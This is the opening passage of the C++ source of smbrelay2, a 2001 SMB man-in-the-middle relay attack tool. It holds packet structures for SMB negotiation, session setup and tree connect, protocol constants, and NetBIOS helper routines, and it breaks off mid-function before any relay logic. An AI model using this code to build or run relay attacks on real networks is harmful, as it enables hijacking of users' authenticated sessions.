// smbrelay2.cpp : NetBIOS level SMB man-in-the-middle relay attack
// Copyright 2001 Sir Dystic - Cult of the Dead Cow - sirdystic@cultdeadcow.com
#pragma comment( lib, "netapi32.lib" )
#include <windows.h>
#include <nb30.h>
#include <process.h>
#include <stdio.h>
#include <conio.h>
#pragma pack(1)
// Process-wide settings. Defaults are overridden by command-line parsing
// that is not visible in this part of the file — confirm at the use sites.
int g_LanaNum = 0;               // NetBIOS adapter (LANA) number, presumably placed into ncb_lana_num
BOOL g_LocalGroupName = FALSE;   // NOTE(review): meaning not established here — see where it is read
DWORD g_FinalReadTimeout = 3000; // read timeout; units presumably milliseconds — confirm at use
BOOL g_bQuit = FALSE;            // shutdown request flag, presumably polled by worker loops
int g_DebugLevel = 0;            // diagnostic verbosity; 0 = quiet, presumably
#define SERVERDOMAINNAME "PEE"
#define SMBMAGICVAL MAKELONG(MAKEWORD(0xFF, 'S'), MAKEWORD('M', 'B') )
#define NULLNAME "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
#define WILDCARDNAME "*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
#define NBCheck(x, s) if (NRC_GOODRET != x.ncb_retcode) { fprintf(stderr, "Line %d:%s: Got 0x%x from Netbios(): %s\n", __LINE__, s, x.ncb_retcode, NBErrorTxt(x.ncb_retcode)); }
#define DATAGRAMBUFFERSIZE 16384
// Fixed SMB message header as laid out on the wire (byte-packed, see
// #pragma pack(1) above). Field names are the original author's; only the
// byte order and sizes are asserted by this definition.
//
// NOTE(review): the order in which bit-fields are allocated inside a storage
// unit is implementation-defined, so the two flag fields below rely on the
// compiler this was written for (MSVC) packing bits LSB-first — confirm
// before building with another toolchain.
typedef struct {
    DWORD MagicVal;           // presumably holds SMBMAGICVAL (bytes FF 'S' 'M' 'B')
    BYTE Command;             // presumably one of the SMB_COM_* values defined below
    union
    {
        struct                // DOS-style status: class + code
        {
            BYTE ErrorClass;
            BYTE Reserved;
            WORD ErrorCode;
        };
        DWORD NTError;        // the same 4 bytes read as one 32-bit NT status
    };
    // flags field (8 bits, one storage byte)
    BYTE bLockAndReadWriteAndUnlock:1;
    BYTE bSendWithoutAck:1;
    BYTE bReservedBit:1;
    BYTE bNoCaseSensitivePaths:1;
    BYTE bCanonicalizedPaths:1;
    BYTE bOpportunisticLocks:1;
    BYTE bChangeNotify:1;
    BYTE bResponse:1;         // set on server replies, presumably
    // 2nd flags field (16 bits, two storage bytes)
    BYTE bLongFilenames:1;
    BYTE bExtendedAttributes:1;
    BYTE bFlags2IsLongName:1;
    BYTE bUnknown1:1;
    BYTE bUnknown2:1;
    BYTE bUnknown3:1; //***
    BYTE bUnknown4:1;
    BYTE bUnknown5:1; //***
    BYTE bUnknown6:1;
    BYTE bUnknown7:1;
    BYTE bUnknown8:1;
    BYTE bExtendedSecurity:1;
    BYTE bResolveViaDFS:1;
    BYTE bReadGrantedWithExecPerms:1;
    BYTE bNTErrorCodes:1;     // when set, the union above is presumably read as NTError
    BYTE bUnicodeStrings:1;
    WORD PID;
    DWORD HdrReserved;
    WORD SessionID;
    WORD SequenceNumber;
    BYTE Padding[2];
    WORD TreeID;
    WORD CallersProcess;
    WORD UserID;
    WORD MultiplexID;
} SMBHEADER, *PSMBHEADER;
// Parameter block that follows the SMB header in the server's dialect
// selection (NEGOTIATE response), byte-packed. Len is the SMB word count and
// is expected to be SMBDIALECTSELECTHEADER_LEN (17).
//
// NOTE(review): as with SMBHEADER, the bit-field groups below assume an
// LSB-first allocation order, which is implementation-defined.
typedef struct {
    BYTE Len; // should be 17
    WORD DialectIndex;              // index into the dialect list the client offered, presumably
    // security mode (8 bits)
    BYTE bUserLevelSecurity:1;
    BYTE bEncryptPasswords:1;
    BYTE bSecuritySignaturesEnabled:1;
    BYTE bSecuritySignaturesRequired:1;
    BYTE bReserved:4;
    WORD MaxPendingMpxRequests;
    WORD MaxVCsInClientAndServer;
    DWORD MaxTransmitBufferSize;
    DWORD MaxRawBufferSize;
    DWORD UniqueSessionKey;
    // capabilities (32 bits spread over four storage bytes)
    BYTE bReadAndWriteRawMode:1;
    BYTE bReadAndWriteMultiplexMode:1;
    BYTE bUnicode:1;
    BYTE bLargeFiles:1;
    BYTE bNTLM012Dialect:1;
    BYTE bRAPIviaRPC:1;
    BYTE bNT32BitStatus:1;
    BYTE bLevelIIOplocks:1;
    BYTE bLOCK_AND_READ_Command:1;
    BYTE bNT_FIND_SBM_Command:1;
    BYTE Unused1:2;
    BYTE bDFSAware:1;
    BYTE Unused2:3;
    BYTE Unused3;
    BYTE Unused4:5;
    BYTE bBulkTransfer:1;
    BYTE bCompressedData:1;
    BYTE bExtendedSecurity:1;
    DWORD SystemDate;
    DWORD SystemTime;
    WORD TimeZone;
    BYTE EncryptionKeyLen;          // presumably SMBENCRYPTIONKEYLEN (8) when a challenge follows — confirm at use
    WORD ByteCount;                 // size of the data block that follows, presumably
} SMBDIALECTSELECTHEADER, *PSMBDIALECTSELECTHEADER;
#define SMBDIALECTSELECTHEADER_LEN 17
// SESSION_SETUP_ANDX request parameters, 10-word form (byte-packed). Len is
// the SMB word count and is expected to be SESSION_SETUP_ANDHEADER_LEN (10).
// Two sibling layouts (…2 and …2EX) cover the 13- and 12-word variants.
typedef struct
{
    BYTE Len; // should be 10
    BYTE AndXCommand;        // next chained command, presumably SMB_NONE (0xFF) when none
    BYTE AndXReserved;
    WORD AndXOffset;         // offset of the chained command's block, presumably
    WORD MaxBufferSize;
    WORD MaxMpxCount;
    WORD VcNumber; // 0 = first (only), nonzero=additional VC number
    DWORD SessionKey;
    WORD PasswordLen;        // byte length of the password that follows in the data block, presumably
    DWORD Reserved;
    WORD ByteCount;
} SESSION_SETUP_ANDHEADER, *PSESSION_SETUP_ANDHEADER;
#define SESSION_SETUP_ANDHEADER_LEN 10
// SESSION_SETUP_ANDX request parameters, 13-word form (byte-packed). Len is
// expected to be SESSION_SETUP_ANDHEADER2_LEN (13). Differs from the 10-word
// form by carrying two password lengths and a client capability mask.
typedef struct
{
    BYTE Len; // should be 13
    BYTE AndXCommand;
    BYTE AndXReserved;
    WORD AndXOffset;
    WORD MaxBufferSize;
    WORD MaxMpxCount;
    WORD VcNumber; // 0 = first (only), nonzero=additional VC number
    DWORD SessionKey;
    WORD CaseInsensitivePasswordLen;   // length of the first password blob in the data area, presumably
    WORD CaseSensitivePasswordLen;     // length of the second password blob, presumably
    DWORD Reserved;
    DWORD ClientCaps;
    WORD ByteCount;
} SESSION_SETUP_ANDHEADER2, *PSESSION_SETUP_ANDHEADER2;
#define SESSION_SETUP_ANDHEADER2_LEN 13
// SESSION_SETUP_ANDX request parameters, 12-word extended-security form
// (byte-packed). Len is expected to be SESSION_SETUP_ANDHEADER2EX_LEN (12).
// A single SecurityBlobLen replaces the two password lengths of the 13-word form.
typedef struct
{
    BYTE Len; // should be 12
    BYTE AndXCommand;
    BYTE AndXReserved;
    WORD AndXOffset;
    WORD MaxBufferSize;
    WORD MaxMpxCount;
    WORD VcNumber; // 0 = first (only), nonzero=additional VC number
    DWORD SessionKey;
    WORD SecurityBlobLen;    // length of the opaque security blob in the data area, presumably
    DWORD Reserved;
    DWORD ClientCaps;
    WORD ByteCount;
} SESSION_SETUP_ANDHEADER2EX, *PSESSION_SETUP_ANDHEADER2EX;
#define SESSION_SETUP_ANDHEADER2EX_LEN 12
// SESSION_SETUP_ANDX response parameters (byte-packed). Len is expected to be
// SESSION_SETUP_ANDRESPONSEHEADER_LEN (3). The data block that follows is
// described by the comment after this definition.
typedef struct
{
    BYTE Len; // should be 3
    BYTE AndXCommand;
    BYTE AndXReserved;
    WORD AndXOffset;
    WORD Action;             // server-reported action flags; bit meanings not established here
    WORD ByteCount;
} SESSION_SETUP_ANDRESPONSEHEADER, *PSESSION_SETUP_ANDRESPONSEHEADER;
// followed by
// SZ Server native OS
// SZ Server native LanMan
// SZ Server primary domain
#define SESSION_SETUP_ANDRESPONSEHEADER_LEN 3
// TREE_CONNECT_ANDX request parameters (byte-packed). Len is expected to be
// TREE_CONNECT_ANDHEADER_LEN (4).
typedef struct
{
    BYTE Len; // should be 4
    BYTE AndXCommand;
    BYTE AndXReserved;
    WORD AndXOffset;
    WORD Flags;
    WORD PasswordLen;        // length of the share password in the data area, presumably
    WORD ByteCount;
} TREE_CONNECT_ANDHEADER, *PTREE_CONNECT_ANDHEADER;
#define TREE_CONNECT_ANDHEADER_LEN 4
// TREE_CONNECT_ANDX response parameters (byte-packed). Len is expected to be
// TREE_CONNECT_ANDRESPONSEHEADER_LEN (3). The data block that follows is
// described by the comment after this definition.
typedef struct
{
    BYTE Len; // should be 3
    BYTE AndXCommand;
    BYTE AndXReserved;
    WORD AndXOffset;
    WORD OptionalSupport;
    WORD ByteCount;
} TREE_CONNECT_ANDRESPONSEHEADER, *PTREE_CONNECT_ANDRESPONSEHEADER;
// followed by
// SZ Servicetype connected to
// SZ NativeFileSystem
#define TREE_CONNECT_ANDRESPONSEHEADER_LEN 3
// NT_CREATE_ANDX request parameters (byte-packed). Len is expected to be
// NT_CREATE_ANDHEADER_LEN (24). The LARGE_INTEGER member is 8 bytes and is
// unaligned here because of the pack(1) directive at the top of the file.
typedef struct
{
    BYTE Len; // should be 24
    BYTE AndXCommand;
    BYTE AndXReserved;
    WORD AndXOffset;
    BYTE Reserved;
    WORD NameLength;         // byte length of the file name in the data area, presumably
    DWORD Flags;
    DWORD RootDirectoryFid;
    DWORD AccessMask;
    LARGE_INTEGER AllocationSize;
    DWORD ExtFileAttributes;
    DWORD ShareAccess;
    DWORD CreateDisposition;
    DWORD CreateOptions;
    DWORD ImpersonationLevel;
    BYTE SecurityFlags;
    WORD ByteCount;
} NT_CREATE_ANDHEADER, *PNT_CREATE_ANDHEADER;
#define NT_CREATE_ANDHEADER_LEN 24
#define TYPE_SESSION_MESSAGE 0x00
#define TYPE_SESSION_REQUEST 0x81
#define TYPE_POSITIVE_SESSION_RESPONSE 0x82
#define TYPE_NEGATIVE_SESSION_RESPONSE 0x83
#define TYPE_RETARGET_SESSION_RESPONSE 0x84
#define TYPE_SESSION_KEEP_ALIVE 0x85
#define SMB_COM_CREATE_DIRECTORY 0x00
#define SMB_COM_DELETE_DIRECTORY 0x01
#define SMB_COM_OPEN 0x02
#define SMB_COM_CREATE 0x03
#define SMB_COM_CLOSE 0x04
#define SMB_COM_FLUSH 0x05
#define SMB_COM_DELETE 0x06
#define SMB_COM_RENAME 0x07
#define SMB_COM_QUERY_INFORMATION 0x08
#define SMB_COM_SET_INFORMATION 0x09
#define SMB_COM_READ 0x0A
#define SMB_COM_WRITE 0x0B
#define SMB_COM_LOCK_BYTE_RANGE 0x0C
#define SMB_COM_UNLOCK_BYTE_RANGE 0x0D
#define SMB_COM_CREATE_TEMPORARY 0x0E
#define SMB_COM_CREATE_NEW 0x0F
#define SMB_COM_CHECK_DIRECTORY 0x10
#define SMB_COM_PROCESS_EXIT 0x11
#define SMB_COM_SEEK 0x12
#define SMB_COM_LOCK_AND_READ 0x13
#define SMB_COM_WRITE_AND_UNLOCK 0x14
#define SMB_COM_READ_RAW 0x1A
#define SMB_COM_READ_MPX 0x1B
#define SMB_COM_READ_MPX_SECONDARY 0x1C
#define SMB_COM_WRITE_RAW 0x1D
#define SMB_COM_WRITE_MPX 0x1E
#define SMB_COM_WRITE_COMPLETE 0x20
#define SMB_COM_SET_INFORMATION2 0x22
#define SMB_COM_QUERY_INFORMATION2 0x23
#define SMB_COM_LOCKING_ANDX 0x24
#define SMB_COM_TRANSACTION 0x25
#define SMB_COM_TRANSACTION_SECONDARY 0x26
#define SMB_COM_IOCTL 0x27
#define SMB_COM_IOCTL_SECONDARY 0x28
#define SMB_COM_COPY 0x29
#define SMB_COM_MOVE 0x2A
#define SMB_COM_ECHO 0x2B
#define SMB_COM_WRITE_AND_CLOSE 0x2C
#define SMB_COM_OPEN_ANDX 0x2D
#define SMB_COM_READ_ANDX 0x2E
#define SMB_COM_WRITE_ANDX 0x2F
#define SMB_COM_CLOSE_AND_TREE_DISC 0x31
#define SMB_COM_TRANSACTION2 0x32
#define SMB_COM_TRANSACTION2_SECONDARY 0x33
#define SMB_COM_FIND_CLOSE2 0x34
#define SMB_COM_FIND_NOTIFY_CLOSE 0x35
#define SMB_COM_TREE_CONNECT 0x70
#define SMB_COM_TREE_DISCONNECT 0x71
#define SMB_COM_NEGOTIATE 0x72
#define SMB_COM_SESSION_SETUP_ANDX 0x73
#define SMB_COM_LOGOFF_ANDX 0x74
#define SMB_COM_TREE_CONNECT_ANDX 0x75
#define SMB_COM_QUERY_INFORMATION_DISK 0x80
#define SMB_COM_SEARCH 0x81
#define SMB_COM_FIND 0x82
#define SMB_COM_FIND_UNIQUE 0x83
#define SMB_COM_NT_TRANSACT 0xA0
#define SMB_COM_NT_TRANSACT_SECONDARY 0xA1
#define SMB_COM_NT_CREATE_ANDX 0xA2
#define SMB_COM_NT_CANCEL 0xA4
#define SMB_COM_OPEN_PRINT_FILE 0xC0
#define SMB_COM_WRITE_PRINT_FILE 0xC1
#define SMB_COM_CLOSE_PRINT_FILE 0xC2
#define SMB_COM_GET_PRINT_QUEUE 0xC3
#define SMB_COM_READ_BULK 0xD8
#define SMB_COM_WRITE_BULK 0xD9
#define SMB_COM_WRITE_BULK_DATA 0xDA
#define SMB_NONE 0xFF
// The original MSNET SMB protocol (otherwise known as the "core protocol")
#define LANMANDIALECT_PCNETWORKPROGRAM10 "PC NETWORK PROGRAM 1.0"
// Some versions of the original MSNET defined this as an alternate to the core protocol name
#define LANMANDIALECT_PCLAN10 "PCLAN1.0"
// This is used for the MS-NET 1.03 product. It defines Lock&Read,Write&Unlock, and a special version of raw read and raw write.
#define LANMANDIALECT_MICROSOFTNETWORKS103 "MICROSOFT NETWORKS 1.03"
// This is the DOS LANMAN 1.0 specific protocol. It is equivalent to the LANMAN 1.0 protocol, except the server is required to map errors from the OS/2 error to an appropriate DOS error.
#define LANMANDIALECT_MICROSOFTNETWORKS30 "MICROSOFT NETWORKS 3.0"
// This is the first version of the full LANMAN 1.0 protocol
#define LANMANDIALECT_LANMAN10 "LANMAN1.0"
// This is the first version of the full LANMAN 2.0 protocol
#define LANMANDIALECT_LM12X002 "LM1.2X002"
// This is the DOS equivalent of the LM1.2X002 protocol. It is identical to the LM1.2X002 protocol, but the server will perform error mapping to appropriate DOS errors.
#define LANMANDIALECT_DOSLM12X002 "DOS LM1.2X002"
// DOS LANMAN2.1
#define LANMANDIALECT_DOSLANMAN21 "DOS LANMAN2.1"
// OS/2 LANMAN2.1
#define LANMANDIALECT_LANMAN21 "LANMAN2.1"
// Windows for Workgroups Version 1.0
#define LANMANDIALECT_WFW31A "Windows for Workgroups 3.1a"
// The SMB protocol designed for NT networking. This has special SMBs which duplicate the NT semantics.
#define LANMANDIALECT_NTLM012 "NT LM 0.12"
#define SMBENCRYPTIONKEYLEN 8
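// Map a NetBIOS NCB return code (ncb_retcode) to a short human-readable text.
//
// Er      the NRC_* value reported by Netbios().
// Returns a pointer to a string literal; the caller must not free or modify
//         it. Codes not in the table yield "Unknown".
//
// The return type is const-qualified for consistency with GetCommandType()
// and because every value returned points at read-only literal storage; the
// only use visible in this file passes the result to fprintf() as a "%s"
// argument (NBCheck macro).
const char *NBErrorTxt(int Er)
{
    // Code/text pairs taken from the NCB return-code list. Lookup is a linear
    // scan; the table is small and this is only called on error paths.
    static const struct {
        int code;
        const char *text;
    } NBErrorTable[] = {
        { NRC_GOODRET,     "good return" },
        { NRC_BUFLEN,      "illegal buffer length" },
        { NRC_ILLCMD,      "illegal command" },
        { NRC_CMDTMO,      "command timed out" },
        { NRC_INCOMP,      "message incomplete, issue another command" },
        { NRC_BADDR,       "illegal buffer address" },
        { NRC_SNUMOUT,     "session number out of range" },
        { NRC_NORES,       "no resource available" },
        { NRC_SCLOSED,     "session closed" },
        { NRC_CMDCAN,      "command cancelled" },
        { NRC_DUPNAME,     "duplicate name" },
        { NRC_NAMTFUL,     "name table full" },
        { NRC_ACTSES,      "no deletions, name has active sessions" },
        { NRC_LOCTFUL,     "local session table full" },
        { NRC_REMTFUL,     "remote session table full" },
        { NRC_ILLNN,       "illegal name number" },
        { NRC_NOCALL,      "no callname" },
        { NRC_NOWILD,      "cannot put * in NCB_NAME" },
        { NRC_INUSE,       "name in use on remote adapter" },
        { NRC_NAMERR,      "name deleted" },
        { NRC_SABORT,      "session ended abnormally" },
        { NRC_NAMCONF,     "name conflict detected" },
        { NRC_IFBUSY,      "interface busy, IRET before retrying" },
        { NRC_TOOMANY,     "too many commands outstanding, retry later" },
        { NRC_BRIDGE,      "ncb_lana_num field invalid" },
        { NRC_CANOCCR,     "command completed while cancel occurring" },
        { NRC_CANCEL,      "command not valid to cancel" },
        { NRC_DUPENV,      "name defined by another local process" }, // typo "anther" fixed
        { NRC_ENVNOTDEF,   "environment undefined. RESET required" },
        { NRC_OSRESNOTAV,  "required OS resources exhausted" },
        { NRC_MAXAPPS,     "max number of applications exceeded" },
        { NRC_NOSAPS,      "no saps available for netbios" },
        { NRC_NORESOURCES, "requested resources are not available" },
        { NRC_INVADDRESS,  "invalid ncb address or length > segment" },
        { NRC_INVDDID,     "invalid NCB DDID" },
        { NRC_LOCKFAIL,    "lock of user area failed" },
        { NRC_OPENERR,     "NETBIOS not loaded" },
        { NRC_SYSTEM,      "system error" },
        { NRC_PENDING,     "asynchronous command is not yet finished" },
    };
    const size_t Count = sizeof NBErrorTable / sizeof NBErrorTable[0];
    for (size_t i = 0; i < Count; i++) {
        if (NBErrorTable[i].code == Er)
            return NBErrorTable[i].text;
    }
    return "Unknown";
}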
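// Write a NetBIOS name to stderr: the 15 name characters, left-justified and
// space-padded to NCBNAMSZ columns, followed by the 16th (suffix) byte as
// "<xx>". No newline is written.
//
// name  points at NCBNAMSZ bytes; it is not required to be NUL-terminated.
//
// The bytes come from the network or from adapter name tables and are not
// trusted: anything outside printable ASCII (including NUL) is shown as '.',
// so control or escape sequences never reach the terminal unfiltered. A
// consequence is that embedded NULs are displayed in place instead of
// truncating the name the way a C-string print would.
void PrintNetBIOSName(const unsigned char *name)
{
    char PrintName[NCBNAMSZ];
    for (int x = 0; x < NCBNAMSZ - 1; x++) {
        unsigned char c = name[x];
        PrintName[x] = (c >= 0x20 && c < 0x7F) ? (char)c : '.';
    }
    PrintName[NCBNAMSZ - 1] = '\0';
    // "%-*s" pads with spaces up to NCBNAMSZ columns, so a full 15-character
    // name is always followed by exactly one space before the suffix.
    fprintf(stderr, "%-*s<%02x>", NCBNAMSZ, PrintName, name[NCBNAMSZ - 1]);
}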
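// Build a NetBIOS name (NCBNAMSZ bytes, not NUL-terminated) from a
// command-line argument of the form "NAME" or "NAME\xx", where xx is the
// suffix byte in hex.
//
// dest  receives NCBNAMSZ bytes: the upper-cased name, padded with spaces
//       (or with NULs when src is the wildcard "*"), then the suffix byte.
// src   is modified in place: it is cut at the first backslash and trailing
//       spaces are stripped (the first character is never stripped). Names
//       longer than NCBNAMSZ-1 bytes are truncated.
//
// The suffix is parsed with strtoul(); text that is not valid hex silently
// yields 0, matching the original behaviour.
void ParamToNetBIOSName(char *dest, char *src)
{
    char *BinValPtr = strchr(src, '\\');
    if (BinValPtr != NULL)
        *BinValPtr = '\0';

    // Strip trailing spaces by index. The original walked a pointer that was
    // formed one before src when the name part was empty, which is undefined.
    size_t len = strlen(src);
    while (len > 1 && src[len - 1] == ' ')
        src[--len] = '\0';
    if (len > (size_t)(NCBNAMSZ - 1))
        len = NCBNAMSZ - 1;

    // The wildcard name is NUL-padded; every other name is space-padded.
    memset(dest, strcmp(src, WILDCARDNAME) == 0 ? 0 : ' ', NCBNAMSZ - 1);
    memcpy(dest, src, len);

    // Suffix byte: hex digits after the backslash, else 0.
    if (BinValPtr != NULL)
        dest[NCBNAMSZ - 1] = (char)(unsigned char)strtoul(BinValPtr + 1, NULL, 16);
    else
        dest[NCBNAMSZ - 1] = 0;

    // Upper-case the name part. The cast matters: passing a negative char
    // (high-bit byte from the command line) to toupper() is undefined.
    for (int x = 0; x < NCBNAMSZ - 1; x++)
        dest[x] = (char)toupper((unsigned char)dest[x]);
}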
// Dump len bytes from src to stderr as upper-case hex pairs with no
// separators, then a single space. When len is 0 nothing at all is written
// (not even the trailing space).
void PrintHexString(BYTE *src, int len)
{
    if (len == 0)
        return;
    for (int i = 0; i < len; i++)
        fprintf(stderr, "%02X", src[i]);
    fputc(' ', stderr);
}
const char *GetCommandType(BYTE Command)
{
static char retbuff[64];
char * ret = retbuff;
switch(Command)